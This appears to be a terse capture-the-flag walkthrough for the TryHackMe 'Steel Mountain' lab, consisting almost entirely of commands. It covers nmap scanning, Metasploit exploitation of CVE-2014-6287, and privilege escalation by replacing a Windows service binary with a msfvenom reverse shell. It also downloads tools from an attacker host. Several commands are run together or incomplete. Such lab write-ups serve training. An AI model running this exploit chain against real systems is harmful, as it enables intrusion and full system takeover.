TryHackMe: Steel Mountain

  1. Deploy the machine.Who is the employee of the month?
nmap -Pn <ip>
nmap -sV -O <ip>
nmap --script vuln <ip>
port 80 -> http-vuln-cve2015–1635
port 8080 —> http-vuln-cve2011–3192
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
msfconsolesearch 2014-6287
use 0show options
set RHOSTS <target ip>set RPORT 8080run
cd /Usersls
cd billls
cd Desktopls
cat user.txt
  1. Upload Script
upload <path>
load powershellpowershell_shell
. .\Powerup.ps1Invoke-Allchecks
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
use multi/handlerset LHOST <attacker ip>set LPORT <attacker port>
sessions 3
upload /root/Desktop/ASCService.exe
shellsc stop AdvancedSystemCareService9
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9
migrate 648getsystem
cd /Users/Administrator/Desktoplscat root.txt
  1. Save script from
python -m SimpleHTTPServer 80
nc -lvp 4444
python <ip> 8080
mv ncat.exe nc.exe
python <ip> 8080
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://<attacker ip>/winPEAS.exe"
AdvancedSystemCareService9C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
powershell -c "Get-Service"
cd \Program Files (x86)\IObit\Advanced SystemCare
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1234 -f exe -o ASCService.exe
nc -lvp 1234
sc stop AdvancedSystemCareService9
rename ASCService.exe ASCService_bak.exe
powershell -c "Invoke-WebRequest -OutFile ASCService.exe"
sc start AdvancedSystemCareService9

